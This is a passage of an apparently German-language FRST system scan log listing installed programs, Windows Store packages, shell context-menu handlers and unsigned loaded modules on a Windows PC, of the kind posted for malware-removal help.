icecap_collection_neutral (HKLM-x32\...\{2A00DCB3-752F-446C-B3B3-1B6ADFBFF3E3}) (Version: 16.6.30014 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{BE5E54C4-6B68-4AE3-A7F4-45F0D29D48D3}) (Version: 16.6.30014 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{CDEDC7CB-8283-4F13-903E-CF3C2C4CFF6D}) (Version: 16.6.30014 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{85FF8308-26DA-4D4B-9267-AFAC4CBFE08C}) (Version: 16.6.30014 - Microsoft Corporation) Hidden
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{4551f75f-3c54-4f09-8221-8c8a061bad00}) (Version: 10.1.18019.8144 - Intel(R) Corporation)
JDownloader 2 (HKLM-x32\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Kits Configuration Installer (HKLM-x32\...\{63AAA877-5536-9481-2385-28A082100D78}) (Version: 10.1.18362.1 - Microsoft) Hidden
Krita (x64) 4.3.0 (HKLM\...\Krita_x64) (Version: 4.3.0.0 - Krita Foundation)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\Riot Game league_of_legends.live) (Version:  - Riot Games, Inc)
Lenovo Migration Assistant (HKLM\...\Lenovo Migration Assistant_is1) (Version: 2.1.2.32 - Lenovo)
Lenovo Vantage Service (HKLM-x32\...\VantageSRV_is1) (Version: 3.3.115.0 - Lenovo Group Ltd.)
Malwarebytes version 4.2.1.89 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.2.1.89 - Malwarebytes)
Microsoft .NET Framework 4.8 SDK (HKLM-x32\...\{DA855582-B360-4532-B8C4-ECD1E5A7095B}) (Version: 4.8.04084 - Microsoft Corporation)
Microsoft .NET Framework 4.8 Targeting Pack (HKLM-x32\...\{7D846F37-3C30-47C5-BCEA-2929EE09BE9A}) (Version: 4.8.04084 - Microsoft Corporation)
Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.13127.20408 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.68 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.37 - )
Microsoft OneDrive (HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\OneDriveSetup.exe) (Version: 20.143.0716.0003 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{97238E8A-4919-4A1E-965A-C6C36938F4CE}) (Version: 2.68.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.26.28720 (HKLM-x32\...\{7d607fb4-7e28-4c7a-a92f-3fcdaf555faf}) (Version: 14.26.28720.3 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.26.28720 (HKLM-x32\...\{86380aef-fd23-4fc3-8723-a98ccad8f2c6}) (Version: 14.26.28720.3 - Microsoft Corporation)
Microsoft Visual Studio Code (User) (HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.47.2 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 2.6.2037.624 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2019 CTP2.2 (HKLM\...\{0AF3B52A-F38D-4D63-9F72-73623C601CD9}) (Version: 15.0.1200.24 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2019 CTP2.2 (HKLM-x32\...\{BF16A1DB-06A6-4A8E-B7A8-61F1F9C9FBA3}) (Version: 15.0.1200.24 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{E15F69FA-660D-45CC-B28F-6CBC4CAD2091}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox 81.0.1 (x64 de) (HKLM\...\Mozilla Firefox 81.0.1 (x64 de)) (Version: 81.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 76.0.1 - Mozilla)
MSI Development Tools (HKLM-x32\...\{DB4DB790-64DD-1902-4BF2-833B3B6DBCA1}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
MSI Development Tools (HKLM-x32\...\{EEA4F337-23C8-A799-9331-18B5746625CE}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.19 - NVIDIA Corporation) Hidden
NVIDIA GeForce Experience 3.20.1.57 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.20.1.57 - NVIDIA Corporation)
NVIDIA Grafiktreiber 451.67 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 451.67 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.19.0218 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.19.0218 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 25.0.8 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.13127.20164 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.13127.20378 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0407-1000-0000000FF1CE}) (Version: 16.0.13127.20164 - Microsoft Corporation) Hidden
Oracle VM VirtualBox 6.1.6 (HKLM\...\{E005321C-489A-4C1A-BCF8-ADA60D229880}) (Version: 6.1.6 - Oracle Corporation)
Paket zur Festlegung von "Doc Redirected"-Zielversionen von Microsoft .NET Framework 4.7.1 (Deutsch) (HKLM-x32\...\{5B970BE4-A2F2-41BD-8B91-FEA8DAA1DB9B}) (Version: 4.7.02558 - Microsoft Corporation) Hidden
PyCharm Community Edition 2020.1.1 (HKLM-x32\...\PyCharm Community Edition 2020.1.1) (Version: 201.7223.92 - JetBrains s.r.o.)
Python 3.8.3 (32-bit) (HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\{6f6f2a2d-6475-4359-bc65-b2cf464bd085}) (Version: 3.8.3150.0 - Python Software Foundation)
Python 3.8.3 Core Interpreter (32-bit) (HKLM-x32\...\{D3A7FDC5-BA4E-44FC-8822-800226B81C71}) (Version: 3.8.3150.0 - Python Software Foundation) Hidden
Python 3.8.3 Development Libraries (32-bit) (HKLM-x32\...\{EA35D9DB-86A9-4705-9D15-7FE33E261450}) (Version: 3.8.3150.0 - Python Software Foundation) Hidden
Python 3.8.3 Documentation (32-bit) (HKLM-x32\...\{BAF129CE-5C13-4383-9807-A44055644E08}) (Version: 3.8.3150.0 - Python Software Foundation) Hidden
Python 3.8.3 Executables (32-bit) (HKLM-x32\...\{D1EFF389-2F77-4A46-8AFD-4F37BC6F1F99}) (Version: 3.8.3150.0 - Python Software Foundation) Hidden
Python 3.8.3 pip Bootstrap (32-bit) (HKLM-x32\...\{4ADFAA3D-1670-4161-A64A-83535B6D78C6}) (Version: 3.8.3150.0 - Python Software Foundation) Hidden
Python 3.8.3 Standard Library (32-bit) (HKLM-x32\...\{26B2CC8C-1492-437D-B27A-655AFB3647DE}) (Version: 3.8.3150.0 - Python Software Foundation) Hidden
Python 3.8.3 Tcl/Tk Support (32-bit) (HKLM-x32\...\{56AC5D63-87FC-4BA0-B4F2-6013D58F3302}) (Version: 3.8.3150.0 - Python Software Foundation) Hidden
Python 3.8.3 Test Suite (32-bit) (HKLM-x32\...\{0F5C1C82-9A7A-4FB4-8681-D4E7E9BBFD9C}) (Version: 3.8.3150.0 - Python Software Foundation) Hidden
Python 3.8.3 Utility Scripts (32-bit) (HKLM-x32\...\{14A8B424-0141-4E46-A1E2-548DF8349BB7}) (Version: 3.8.3150.0 - Python Software Foundation) Hidden
Python Launcher (HKLM-x32\...\{406A47EE-C4AE-4944-BADE-1B543A443873}) (Version: 3.8.7072.0 - Python Software Foundation)
Racket v7.8 (x86_64) (HKLM-x32\...\Racket-x86_64-7.8) (Version: 7.8 - Racket)
Rockstar Games Launcher (HKLM-x32\...\Rockstar Games Launcher) (Version: 1.0.26.268 - Rockstar Games)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 2.0.6.1 - Rockstar Games)
RogueKiller Version 14.7.3.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 14.7.3.0 - Adlice Software)
Samsung Drucker-Diagnose (HKLM-x32\...\Samsung Printer Diagnostics) (Version: 1.0.1.6.02 - Samsung Electronics Co., Ltd.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 2.00.01.24 - HP Printing Korea Co., Ltd.)
Samsung M2070 Series (HKLM-x32\...\Samsung M2070 Series) (Version: 1.27 (21.07.2017) - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Samsung Scan Process Machine (HKLM-x32\...\Samsung Scan Process Machine) (Version: 1.03.05.28 - Samsung Electronics Co., Ltd.) Hidden
SDK ARM Additions (HKLM-x32\...\{622AAEB8-DF41-C024-C136-E37D23F9EE3C}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{2800EFA4-8E00-EEF9-2890-FACDF8EBBB49}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
SDK Debuggers (HKLM-x32\...\{91C073DA-2474-72C0-3022-3D00A221F43C}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
Shotcut (HKLM-x32\...\Shotcut) (Version: 20.04.12 - Meltytech, LLC)
Spotify (HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\Spotify) (Version: 1.1.41.634.gc2c73ca7 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TwilioQuest 8.0.0 (HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\2ad7503d-bb80-5d6b-af5f-ed260c23917a) (Version: 8.0.0 - Twilio DevEd)
Twitch (HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 8.0.0 - Twitch Interactive, Inc.)
Unity (HKLM-x32\...\Unity) (Version: 2019.4.1f1 - Unity Technologies ApS)
Unity Hub 2.3.2 (HKLM\...\{Unity Technologies - Hub}) (Version: 2.3.2 - Unity Technologies Inc.)
Universal CRT Extension SDK (HKLM-x32\...\{13952D7A-B7B3-F4F8-5F29-5CD18E8168B7}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{4F74E68F-8E9A-854A-267F-B207D8BA293A}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{74CBC330-ED16-31B9-E8BE-0C6A8E67DE32}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{75B4003C-872E-7D47-51F7-D855F1B2B3F2}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{48210A4B-CF20-C3C7-75E6-D564DCABA0FF}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{847D4DAF-0182-265B-324F-406462E8A90D}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{EEDE15C8-BB1F-EB52-B01F-055BEB4209D6}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{09645C4C-3570-8804-9ED6-C3C335679287}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{6F54BF87-2EE6-FA6D-431D-33A665992D49}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{ECB7B330-3BAC-7593-7F5D-FD68A54EA0EF}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Uplay (HKLM-x32\...\Uplay) (Version: 87.0 - Ubisoft)
vcpp_crt.redist.clickonce (HKLM-x32\...\{347077A1-49FA-400B-B069-A3747391C530}) (Version: 14.26.28808 - Microsoft Corporation) Hidden
Visual Studio Community 2019 (HKLM-x32\...\68a7c281) (Version: 16.6.30309.148 - Microsoft Corporation)
Voicemeeter, The Virtual Mixing Console (HKLM-x32\...\VB:Voicemeeter {17359A74-1236-5467}) (Version:  - VB-Audio Software)
VS Immersive Activate Helper (HKLM-x32\...\{A71406B5-E487-4B01-8E59-D466841350F5}) (Version: 16.0.102.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{C7E8A4F2-EF09-42A8-B892-69D5ED99D965}) (Version: 16.0.102.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{A4272808-82F5-410F-A5F9-1BF6F63F6B9A}) (Version: 16.0.102.0 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{2CCEC45B-1462-4FFD-8214-90E3C25000F7}) (Version: 16.6.30014 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{A90E107F-D024-4EEC-A6F4-9E2858B4E506}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{AD0C92A4-1514-4BC1-A723-A272A8343924}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{7A991159-9069-471D-B85F-89B1E4E66822}) (Version: 16.6.30014 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{16E73A5A-339C-4177-A0BD-04278C06625C}) (Version: 16.6.30014 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{C8E7C1FC-925C-4163-BAB3-769E6C7961D2}) (Version: 16.6.30014 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{ABBD10CA-0CFA-4D76-B033-F76C55A54336}) (Version: 16.4.29411 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{E47B4703-2337-4ED0-BA24-3EC08D643684}) (Version: 16.4.29411 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{27B16914-BC5D-4018-8074-071262A27F6D}) (Version: 16.2.28917 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{DA7AB063-D1A3-4D5A-8221-598ACF4574B4}) (Version: 16.6.30014 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6691EA7F-A585-4A9A-A6A9-160CEB236393}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{E208E682-50EE-4F2F-9860-C91B906B8A03}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_vswebprotocolselectormsi (HKLM-x32\...\{5F2E2347-2042-4340-BBDD-262BB1791EC7}) (Version: 16.6.30014 - Microsoft Corporation) Hidden
vs_vswebprotocolselectormsires (HKLM-x32\...\{B3BDDC31-5C64-47F0-A25C-DB5032C62279}) (Version: 16.6.30014 - Microsoft Corporation) Hidden
WhatsApp (HKU\S-1-5-21-392041295-3890174389-3109141049-1001\...\WhatsApp) (Version: 2.2039.9 - WhatsApp)
WinAppDeploy (HKLM-x32\...\{8E3AE0EF-D067-700C-BDB4-10D5552155DC}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinAppDeploy (HKLM-x32\...\{A566DCBF-C346-9707-31E4-7F3ACAB776B6}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
Windows SDK AddOn (HKLM-x32\...\{3E59EFF5-CD7A-4860-A7EC-C33A4FC7297C}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.18362.1 (HKLM-x32\...\{126dedf0-cc0e-4b48-9ece-806b0e437195}) (Version: 10.1.18362.1 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.19041.1 (HKLM-x32\...\{1aef9cb5-faba-471c-b24a-c45dd69d37ea}) (Version: 10.1.19041.1 - Microsoft Corporation)
Windows-Treiberpaket - HS Incorporated (massfilter_hs) USB  (10/20/2010 2.0.0.8) (HKLM\...\80E97631DA49E8B2E4C5B606C9597BC75EE612F5) (Version: 10/20/2010 2.0.0.8 - HS Incorporated)
Windows-Treiberpaket - PANTECH Co., Ltd.  (PSKTBUS) USB  (06/20/2012 4.0.21.0) (HKLM\...\31F11A15A3058696191A3708600383CAA429752E) (Version: 06/20/2012 4.0.21.0 - PANTECH Co., Ltd. )
Windows-Treiberpaket - SAMSUNG Electronics Co., Ltd.  (dg_ssudbus) USB  (06/10/2014 2.11.10.0) (HKLM\...\7C7D77F30DA293C8D56A9D5FB8C3E70F4E17DA7F) (Version: 06/10/2014 2.11.10.0 - SAMSUNG Electronics Co., Ltd. )
Windows-Treiberpaket - SAMSUNG Electronics Co., Ltd.  (ssadbus) USB  (11/30/2012 5.30.14.0) (HKLM\...\C9AEC81E4D365534AF50161EDA7C9CC56B205507) (Version: 11/30/2012 5.30.14.0 - SAMSUNG Electronics Co., Ltd. )
Windows-Treiberpaket - SAMSUNG Electronics Co., Ltd.  (ssaebus) USB  (02/05/2010 5.14.0.0) (HKLM\...\8CDE6EEFC346A059EC210060FC7B7DAA8279D584) (Version: 02/05/2010 5.14.0.0 - SAMSUNG Electronics Co., Ltd. )
Windows-Treiberpaket - SHARP (shu0bus) USB  (08/11/2011 5.28.4.0) (HKLM\...\8A1FC0FFE8E99DF8171E25D8C5AFF587290A67EF) (Version: 08/11/2011 5.28.4.0 - SHARP)
Windscribe (HKLM-x32\...\{fa690e90-ddb0-4f0c-b3f1-136c084e5fc7}_is1) (Version: 1.83 Build 20 - Windscribe Limited)
WinRAR 5.90 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.90.0 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{D451C34E-ED59-596E-715B-C5C9ABBB34B9}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{E67F1F03-FB4A-3D61-8999-E6A4C4B26F34}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{7EF010FF-7800-28BA-FF49-2D219EC7BA82}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{816A6296-C73E-CDB2-0597-5F142130DFBE}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{2D9D58E6-3F54-6320-42E0-0E9012DC249C}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{36AE12FB-4349-6EAA-B6E4-5F4E06FA8AE8}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{6B03A6A4-643C-57CE-CA6F-4E19BF47497A}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E90226BA-8398-FFB7-FA98-11D8A64A54E6}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{1EED3649-5FA4-E992-9693-5E22F804DD2A}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{918A448F-59E8-FBF5-B087-D3F07160C7E0}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{66483041-F590-EC46-4AF0-EE39C62FB680}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{BA05971B-E447-0F2C-C89C-888D6431995B}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{2FA86110-E0B2-44A0-72A8-13759C5C266F}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{9C61E6D2-C43E-6746-B519-6185558C4A24}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{0A6D1458-0861-EF51-9995-C69C9157CB36}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{6B37CC5B-78DF-5050-2215-68479716A587}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{250D5341-0879-4016-399C-BBCD87B80E95}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{C69004DC-E31D-AB88-AC5B-B5CB9C37B53B}) (Version: 10.1.19041.1 - Microsoft Corporation) Hidden
WPT Redistributables (HKLM-x32\...\{AE00264D-F001-A1D3-F3B8-74A9D2193E7F}) (Version: 10.1.19041.1 - Microsoft) Hidden
WPTx64 (HKLM-x32\...\{FD439F85-AD64-B3E5-9FC5-444AE8C8AF7B}) (Version: 10.1.19041.1 - Microsoft) Hidden

Packages:
=========
Dolby Audio -> C:\Program Files\WindowsApps\DolbyLaboratories.DolbyAudio_3.20500.501.0_x64__rz1tebttyb220 [2020-04-03] (Dolby Laboratories)
Intel® Grafik-Kontrollraum -> C:\Program Files\WindowsApps\AppUp.IntelGraphicsExperience_1.100.2765.0_x64__8j3eq9eme6ctt [2020-08-29] (INTEL CORP) [Startup Task]
Lenovo Vantage -> C:\Program Files\WindowsApps\E046963F.LenovoCompanion_10.2009.18.0_x64__k1h2ywk1493x8 [2020-09-24] (LENOVO INC.)
LenovoUtility -> C:\Program Files\WindowsApps\E0469640.LenovoUtility_3.1.18.0_x64__5grkq8ppsgwt4 [2020-10-01] (LENOVO INC) [Startup Task]
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-09-13] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2020-05-16] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2020-05-16] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-21] (Microsoft Studios) [MS Ad]
MPEG-2-Videoerweiterung -> C:\Program Files\WindowsApps\Microsoft.MPEG2VideoExtension_1.0.22661.0_x64__8wekyb3d8bbwe [2020-05-16] (Microsoft Corporation)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.958.0_x64__56jybvy8sckqj [2020-06-25] (NVIDIA Corp.)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.10.216.0_x64__dt26b99r8h8gj [2020-06-18] (Realtek Semiconductor Corp)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2020-05-16] (Samsung Electronics Co. Ltd.)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-09-30] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nvlt.inf_amd64_6de98d46a9fc896b\nvshext.dll [2020-07-15] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-09-30] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

==================== Verknüpfungen & WMI ========================

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2014-09-08 13:38 - 2014-09-08 13:38 - 000051200 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\Common Desktop Agent\CDASrvPS.dll
2020-05-15 23:52 - 2020-05-15 23:52 - 098275328 _____ () [Datei ist nicht signiert] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libcef.dll
2020-05-15 23:52 - 2020-05-15 23:52 - 000092672 _____ () [Datei ist nicht signiert] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libEGL.dll
2020-05-15 23:52 - 2020-05-15 23:52 - 003922432 _____ () [Datei ist nicht signiert] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libGLESv2.dll
2020-06-18 20:37 - 2020-06-18 20:38 - 000169984 _____ (Fortemedia) [Datei ist nicht signiert] C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.10.216.0_x64__dt26b99r8h8gj\FMAPOCTL.dll
2019-12-06 19:37 - 2019-12-06 19:37 - 000262144 _____ (Microsoft Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2020-08-21 18:48 - 2020-05-30 20:04 - 001638912 _____ (Robert Simpson, et al.) [Datei ist nicht signiert] C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\x64\SQLite.Interop.dll
2017-11-08 08:35 - 2017-11-08 08:35 - 000123904 _____ (Samsung Electronics Co., Ltd.) [Datei ist nicht signiert] C:\Program Files (x86)\Samsung\Easy Printer Manager\SmartScreenPrint\CDAKEYMonitor64.dll
2020-04-03 01:54 - 2020-04-03 01:54 - 000023040 _____ (Synaptics Incorporated.) [Datei ist nicht signiert] C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.10.216.0_x64__dt26b99r8h8gj\SynAudSrvDll.dll
2020-05-15 23:52 - 2020-05-15 23:52 - 000547840 _____ (The Chromium Authors) [Datei ist nicht signiert] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\chrome_elf.dll

